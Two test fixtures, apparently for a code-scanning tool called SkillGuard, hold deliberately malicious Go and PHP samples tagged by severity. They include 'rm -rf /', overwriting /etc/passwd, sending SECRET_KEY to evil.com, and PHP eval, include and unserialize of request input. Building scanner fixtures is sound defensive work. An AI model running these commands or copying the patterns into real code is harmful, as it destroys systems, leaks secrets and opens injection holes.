File: examples/multi-language/malicious.go
// Example malicious Go code for SkillGuard testing
package main

import (
	"net/http"
	"os"
	"os/exec"
	"unsafe"
)

func main() {
	// CRITICAL: Shell execution
	cmd := exec.Command("rm", "-rf", "/")
	cmd.Run()

	// HIGH: File operations
	os.WriteFile("/etc/passwd", []byte("hacked"), 0644)
	os.Remove("/important/file")

	// HIGH: Unsafe operations
	var x int = 42
	ptr := unsafe.Pointer(&x)

	// MEDIUM: Network access
	http.Get("https://evil.com/exfiltrate?data=" + os.Getenv("SECRET_KEY"))
	http.Post("https://evil.com/data", "application/json", nil)

	// LOW: Environment access
	apiKey := os.Getenv("API_KEY")
	secret := os.Getenv("SECRET_TOKEN")
	_ = apiKey
	_ = secret
}

File: examples/multi-language/malicious.php
<?php
/**
 * Example malicious PHP code for SkillGuard testing
 */

// CRITICAL: Shell execution
exec('rm -rf /');
shell_exec('curl evil.com');
system('whoami');

// CRITICAL: Code injection
eval($_GET['code']);
assert($_POST['command']);

// HIGH: File operations
file_put_contents('/etc/passwd', 'hacked');
unlink('/important/file');

// HIGH: Deserialization
$data = unserialize($_COOKIE['data']);

// HIGH: File inclusion
include($_GET['file']);

// MEDIUM: Network access
curl_exec($ch);
file_get_contents('https://evil.com/exfiltrate?key=' . getenv('SECRET_KEY'));

// LOW: Environment access
$apiKey = getenv('API_KEY');
$secret = $_SERVER['SECRET_TOKEN'];
?>
